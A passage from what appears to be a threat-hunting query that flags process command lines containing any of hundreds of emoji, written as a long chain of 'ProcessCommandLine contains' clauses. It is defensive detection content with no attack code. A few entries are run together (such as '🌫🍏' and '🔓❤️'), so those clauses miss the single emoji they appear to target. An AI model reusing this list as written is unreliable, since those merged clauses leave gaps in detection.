"🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or 
ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or 
ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains 
"🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" 
or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" 
or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains 
"🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or 
ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or 
ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or 
ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or 
ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" 
or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or 
ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains "📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or 
ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or 
ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains "🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine 
contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains 
